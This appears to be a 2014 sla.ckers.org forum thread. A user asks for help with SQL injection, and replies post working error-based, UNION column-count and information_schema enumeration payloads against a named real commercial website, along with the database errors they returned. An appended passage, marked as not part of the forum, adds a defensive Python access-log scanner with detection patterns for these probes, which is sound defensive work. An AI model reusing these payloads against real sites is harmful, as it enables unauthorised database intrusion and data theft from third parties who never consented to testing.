Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
i need to refresh my memory...
Posted by: tascio
Date: May 26, 2014 09:53AM

omg I need to remember some sqlinj ^^

http://www.pubblicitafaidate.it/index.php?prod=96

Re: i need to refresh my memory...
Posted by: kenjii
Date: May 26, 2014 07:18PM

Hi, to hack this website I found 3 ways:

1. Use error-based injection
To inject this website, use error-based injection:

http://www.pubblicitafaidate.it/index.php?prod=96 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--

gives you the version in the error:
Duplicate entry '5.1.49-3:1' for key 'group_key'

2. If you still want to use UNION injection:
In the error message you have the table name, so it's easy to get the column count in 1 request:
http://www.pubblicitafaidate.it/index.php?prod=96 and (select * from productos_idiomas)=(select 1)

will give you the error:
Operand should contain 6 column(s)


3. Your injection point is after the WHERE part

Use the ajkaro tutorial to learn how to inject after/before the WHERE part :)

Re: i need to refresh my memory...
Posted by: Whitehat
Date: June 19, 2014 08:30AM

Hope you get the difference :)

http://www.pubblicitafaidate.it/index.php?prod=96+and%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28select+distinct+concat%280x7e%2C0x27%2Cschema_name%2C0x27%2C0x7e%29+from+%60information_schema%60.schemata+limit+1%2C1%29%29+from+%60information_schema%60.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+%60information_schema%60.tables+group+by+x%29a%29+and+1%3D1

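A log-side check for the request shapes posted in this thread, as an added example that is not part of any forum post: it flags every non-integer `prod` value in an access log and labels the error-based patterns quoted above. The log lines, IP addresses, label names and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

PARAM = "prod"  # the numeric id parameter seen in the thread's URLs
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Labels are made up for this example; patterns mirror the probes quoted in the thread.
SIGNATURES = [
    ("duplicate-key error probe", re.compile(r"(?=.*floor\s*\(\s*rand\s*\()(?=.*group\s+by)", re.S)),
    ("column-count probe", re.compile(r"\(\s*select\s+\*\s+from\s+[`\w.]+\s*\)\s*=\s*\(\s*select\b")),
    ("information_schema enumeration", re.compile(r"information_schema")),
    ("trailing SQL comment", re.compile(r"--\s*$")),
]

def normalise(value):
    """Undo extra layers of URL encoding, drop /**/ comments, fold case and whitespace."""
    for _ in range(2):  # parse_qsl already decoded once; this catches double encoding
        value = unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    return re.sub(r"\s+", " ", value).strip().lower()

def classify(target):
    """Return labels for a request target; an empty list means the id is a plain integer."""
    labels = []
    for name, raw in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        value = normalise(raw)
        if name == PARAM and not re.fullmatch(r"\d{1,10}", value):
            labels.append("non-integer id")
            labels += [label for label, rx in SIGNATURES if rx.search(value)]
    return labels

def scan(log_lines):
    """Yield (client_ip, labels) for every access-log line that gets flagged."""
    for line in log_lines:
        m = REQUEST.search(line)
        labels = classify(m.group(1)) if m else []
        if labels:
            yield line.split(" ", 1)[0], labels

# Constructed sample lines using documentation IP ranges; not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [26/May/2014:09:53:00 +0000] "GET /index.php?prod=96 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [26/May/2014:19:18:10 +0000] "GET /index.php?prod=96%20or%201%20group%20by%20concat_ws(0x3a,version(),floor(rand(0)*2))%20having%20min(0)%20or%201-- HTTP/1.1" 200 310',
    '198.51.100.7 - - [26/May/2014:19:18:30 +0000] "GET /index.php?prod=96%2520and%2520(select%2520*%2520from%2520productos_idiomas)%253D(select%25201) HTTP/1.1" 200 295',
    '192.0.2.44 - - [19/Jun/2014:08:30:00 +0000] "GET /index.php?prod=96+and(select+1+from(select+count(*),concat(schema_name,floor(rand(0)*2))x+from+information_schema.schemata+group+by+x)a) HTTP/1.1" 200 402',
]

if __name__ == "__main__":
    for ip, labels in scan(SAMPLE_LOG):
        print(ip, ", ".join(labels))
```

Detection aside, these probes stop returning anything once `prod` is bound as an integer parameter in a prepared statement and database error text is no longer echoed into the page.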